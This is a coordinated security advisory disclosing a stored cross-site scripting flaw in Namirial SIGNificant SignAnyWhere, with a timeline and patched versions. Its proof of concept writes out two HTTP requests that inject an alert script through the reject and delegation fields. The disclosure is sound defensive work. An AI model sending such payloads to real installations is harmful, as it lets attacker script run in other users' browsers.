Stored Cross-Site Scripting (XSS) Vulnerability in Namirial SIGNificant SignAnyWhere

Project Description

A stored cross-site scripting (XSS) vulnerability in the product Namirial SIGNificant SignAnyWhere v6.10.60.25434 & v6.10.100.25817 allows an attacker to attack other users of the web application with malicious JavaScript code.


Vendor description

“Namirial is a Trust Service Provider, focused on addressing the fast growing market of Digital Transaction Management (DTM), which includes legally compliant electronic signatures, managing and tracking documents flows, conducting secure transactions and ensuring secure storage of data.”

Source: https://www.namirial.com/en/trust-services/

Business recommendation

Update to the latest version of Namirial SIGNificant SignAnyWhere. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues.

Vulnerability overview/description

Stored Cross-Site Scripting (Authenticated access)

Due to the lack of input validation and output sanitization, an attacker, who was granted access to a document that is provided by a customer via email, can inject malicious JavaScript code, which will be executed in the browser of a user.

Proof of concept

Stored Cross-Site Scripting (Authenticated access)

The following method can be used to exploit the stored cross-site scripting vulnerability.

Click the link, which was sent to you via email for signing the document.

There are 2 possibilities to inject a cross-site scripting payload:
1: Reject the document.
2: Delegate the document.

The request below shows that an attacker can inject a malicious payload via the rejection functionality (the RejectMessage key is affected).

POST /SawViewer/SignAnywhereServices.asmx/RejectWorkstep HTTP/1.1
Host: $host
      ---snip---
{"basicParameters":{"WorkstepId":"<removed>", "GeolocationLongitude":0,
"GeolocationLatitude":0, "GeolocationErrorState":"NOT_USED",
"Accuracy":-1,"UsedLanguage":"de","SupportId":"<removed>"}, 
"rejectConfiguration":"{\"RejectMessage\":\"
<script>alert(location.origin)</script>\", 
\"Type\":\"Reject\"}"}
POST /SawViewer/SignAnywhereServices.asmx/RejectWorkstep HTTP/1.1
Host: $host
      ---snip---

{"basicParameters":{"WorkstepId":"<removed>", "GeolocationLongitude":0,
"GeolocationLatitude":0, "GeolocationErrorState":"GEOLOC_NO_TIMEOUT",
"Accuracy":-1,"UsedLanguage":"de","SupportId":"<removed>"}, 
"rejectConfiguration":"{\"RejectMessage\":\"",\"Type\":\"Delegation\",
\"AdditionalInformation\":\"{\\\"firstName\\\":\\\"name\\\", 
\\\"lastName\\\":\\\"name\\\", \\\"email\\\":\\\"delegation mail\\\", 
\\\"phoneNumber\\\":\\\"phone number\\\", 
\\\"delegationReason\\\":\\\"<script>alert(location.origin)
</script>\\\"}\"}"}

 

The injected cross-site scripting payload is stored within the application and upon opening the document the payload will be automatically executed.

Vulnerable / tested versions

The following versions of the software have been tested and found to be vulnerable:

  • Namirial SIGNificant SignAnyWhere version v6.10.60.25434 (SSP v4.22.60.25434)
  • Namirial SIGNificant SignAnyWhere version v6.10.100.25817 (SSP v4.22.100.25817)

Previous and newer versions may also be affected.

Vendor contact timeline

 

2020-04-03Contacting vendor through contact form (https://www.namirial.com/de/kontaktformular/)
2020-04-08Response from the vendor with the contact details.
2020-04-10Contact person requests to obtain advisory via Support Platform (Upload Report).
2020-04-10Advisory uploaded to vendor.
2020-05-26Vendor released updated versions (19.76 and 20.14).
2020-06-18Testing patched version (v19.76.0.26030).
2020-07-28Coordinated release of security advisory.

Solution

Upgrade Namirial SIGNificant SignAnyWhere to version v19.76.0.26030 (SSP v19.76.0.26030) or

Upgrade Namirial SIGNificant SignAnyWhere to version v20.14.0.26049 (SSP v20.14.0.26049)

Workaround

none

Advisory URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

EOF Philipp Espernberger / @2020

Interested to work with the experts of SEC Consult? Send us your application
Want to improve your own cyber security with the experts of SEC Consult? Contact our local offices.

Project Details

  • TitleStored Cross-Site Scripting (XSS) Vulnerability
  • ProductNamirial SIGNificant SignAnyWhere
  • Vulnerable versionv6.10.60.25434 (SSP v4.22.60.25434), v6.10.100.25817 (SSP v4.22.100.25817)
  • Fixed version v19.76.0.26030 (SSP v19.76.0.26030), v20.14.0.26049 (SSP v20.14.0.26049)
  • Impacthigh
  • Homepagehttps://www.namirial.com/en/
  • Found2020-04-01
  • ByPhilipp Espernberger (Office Linz) | SEC Consult Vulnerability Lab